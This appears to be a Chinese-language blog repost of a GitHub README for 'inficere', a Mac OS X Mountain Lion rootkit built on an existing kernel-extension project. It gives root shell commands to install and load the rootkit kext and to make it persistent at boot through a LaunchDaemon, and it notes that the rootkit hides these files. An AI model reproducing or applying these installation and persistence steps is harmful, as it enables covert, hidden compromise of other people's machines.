Kate Li (Taiwan)的部落格

首頁

enzolovesbacon/inficre:mac os x rootkit

作者 sebastiani 時間 2020-03-07
all

我的Mac OS X rootkit的公共版本建立在fractalG的onyx黑猫之上(https://github.com/gdbinit/onyx-the-black-cat)

僅在山獅中測試,10.8.2至10.8.5。不能保證在其他版本上工作。

特徵

說明

# chmod -R 755 inficere.kext # chown -R root:wheel inficere.kext # mv inficere.kext /System/Library/Extensions/ # kextutil /System/Library/Extensions/inficere.kext # ./control

對於引導持久性:

# plutil -convert binary1 com.enzo.inficere.plist # mv com.enzo.inficere.plist /Library/LaunchDaemons/com.enzo.inficere.plist # chown root:wheel /Library/LaunchDaemons/com.enzo.inficere.plist # launchctl load -w /Library/LaunchDaemons/com.enzo.inficere.plist

Inficere將在加載後隱藏上述檔案。

我想強調一下,我這樣做只是為了教育目的。